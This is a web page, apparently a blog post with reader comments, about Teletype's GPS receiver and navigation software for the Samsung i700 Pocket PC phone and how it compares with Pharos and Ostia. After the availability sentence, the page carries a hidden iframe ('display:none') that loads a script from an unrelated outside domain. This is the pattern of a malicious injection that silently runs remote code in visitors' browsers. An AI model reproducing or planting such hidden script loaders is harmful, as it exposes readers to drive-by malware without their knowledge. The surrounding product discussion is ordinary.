Teletype Readies GPS for the Samsung i700

Let's give a big "three cheers" for Teletype for figuring out how to do a GPS for the Samsung i700. This device has been a challenge to get a GPS working with, evidenced by the length of time it has taken to produce one from any company.

TeleType offers it's popular navigation software for streets, air, marine, and topo using your Samsung i700 Pocket PC phone. Same great software with visual and voice navigation.

The new receiver is a high-performance low-power 12-channel parallel GPS with on-board patch antenna, and includes serial cable, 12v cigarette power adapter capable of charging the PDA and the GPS receiver.

The mini-AutoGPS features rapid startup time, and high performance in typically challenging environments such as foliage and urban canyons. Receiver is water-resistant and has built in magnetic mount. This package is the perfect setup for carefree use in your car.

Teletype shows an availability date of 11/15 for the i700 GPS a their site HERE.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

No Go

The big problem here is that it is not a handheld solution. Ok for the car and a 12 volt battery; useless without it.

Looks good. Maybe you can modify a car battery into a backpack and run it off of that but maybe thay can create a battery option too later on.

Good comments but you have to remember that there aren't any good SD GPS solutions out there yet, so this is as good as it gets. I use a mouse type GPS in the car with my pdaPhone and love it.

There is supposed to be an SD GPS out on the market within the next month. I am slated to get one for review, so I'll be sure to let everyone know what I think when I get it. The problem with the i700, of course, is that the SD slot is on the side... uggh.

The biggest and best part of this announcement, is that someone has cracked the sync cable port to do serial I/O. That should open things up for other companies as well.

But we still have the memory issue. Unless we this SD GPS unit has memory built in, maps will have to be placed in main memory. That won't work.

Hopefully to kill these issues we'll see dual slot PPCs in the future.

Since I'll be really only using this in the car the Teletype option for me might be a viable one.

Whoa...

Large map sizes. Texas alone is 105 MB.

Teletype before? I read a review where they gave very low points for Teletype World Navigator. Pharos seems to be a better product.

Teletype software is not generally as user friendly as others such as Ostia and Pharos. Having used all of these three, I have to say I prefer Teletype. The software itself is a bit scientific feeling, and not nearly as polished as the others. That said, once you figure it out, the flexibility and power of it is amazing. The Ostia software is pretty, but if it's database doesn't match exactly with your address (ie: Ostia says "RT-15", but the street sign says "East Henrietta Road") you're out of luck. Teletype often has both names, the common and the route. Teletype also allows you to assign waypoints, and use them in routing, such as a favorite restaurant or whatever. The mas are also tiny, which allows me to carry more of them with me. It certainly is not as pretty or easy to use, but it is very powerful.

i700 and GPS

Read posts on this subject with interest. I have an i700 and am looking for the best GPS to work with it. It will be only used in car. The SD memory sounds good..is it available yet? Do you feel the best unit is still the Teletype? Thanks, John

did anyone compare Teletype and Pharos solutions?
Looks like Pharos solution includes maps of US and Canada (Teletype sells Canada maps as a separate package), also Pharos claims multiple options for the receiver connector.
Any Pharos product drawbacks that people are aware of?
Thanks, Leonid
